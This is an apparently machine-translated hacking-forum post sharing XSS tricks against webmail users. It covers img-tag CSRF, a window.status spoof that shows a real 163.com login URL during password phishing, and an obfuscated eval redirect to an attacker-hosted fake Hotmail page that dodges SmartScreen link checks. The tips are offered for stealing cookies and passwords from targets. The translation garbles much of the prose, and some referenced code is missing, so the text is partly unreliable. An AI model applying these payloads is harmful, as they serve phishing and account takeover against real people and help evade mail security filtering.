XSS (first season) By: sH

Author: ShadowHider

Email: s@xeye.us

 

Over the past few days, I 've found many posts discussing XSS in the forum. I 've been tossing XSS for a while before, so I am afraid to share with you.

 

Below are some tips about tips that are not counted as tips. We should have noticed it when using XSS, but I 'd like to write it again to help you make a memo. : P

 

#1 use the img label for CSRF

 

Prior to sleep dragon brother in vivo:

 


In fact, you don't have to worry about it. You can use the following code to achieve the same effect.

 

 

When the img Tag uses the src attribute, a GET request is triggered. We can use it to implement CSRF attacks.

 

If the current browser saves the user's session, the user's access to the page containing the above Code will automatically exit, achieving our goal.

 

#2 browser status bar issues during phishing

 

Many people are keen to get started with their target Email Addresses During Penetration. Various xss mail attacks include Cookie Stealing and password fishing.

 

Taking the fishing password as an example, did you find the browser's status bar slightly embarrassed when executing payload?

 

Haha, add a similar sentence in your payload.

 

Window. status = 'https: // login.163.com/ppsecure/post.srf? Wa = wsignin1.0 ...';

 

Such code will make the entire phishing scenario look more harmonious (the link behind... is the essence, lol ).

 

:

 

 

 

#3 some details about the use of a MAIL XSS

 

Now that I have talked about xss mail, I have talked about it more.

 

We should know that cookies in a mailbox are useless, therefore, the XSS Method Of This mailbox is generally to jump to its own page fishing password (of course, there are also direct use of ajax to read emails), but directly write its own phishing link in payload, then it is sent out to the target inbox. After you open the email, it will not execute our payload.

However, this is not the case if you add your inbox as a contact in the target mailbox. Of course, this is unrealistic...

 

The reason is that SmartScreen will check the links included in the email. It should be detected by a whitelist mechanism. If it does not match, it will be blocked.

 

Here For more information http://www.microsoft.com/mscorp/safety/technologies/senderid/overview.mspx

 

It seems that this is a strange thing.

 

Of course, since javascript can be executed here, bypassing this detection mechanism is not difficult. just confuse the link, as shown below:

 

Eval (window. location. replace ('hfuckttfuckp: fuck/1fuck11. 111. fuck111.11/sn123w. snt1fuck23. mafuckil. fucklivefuck. cfuckom/hofucktmailfuck.htm '. replace (/fuck/g ,'')))

 

After modifying the payload, test it again and find that it will not be blocked by SmartScreen. Open the email and jump directly to bingo!

 

Let's write so much about it first. I want to know where to write it. I don't need to go to the brain. There is no logic. If there are any omissions in this article, please look down on them. You are welcome to criticize and correct them. Here is just a reference. You are welcome to share your ideas.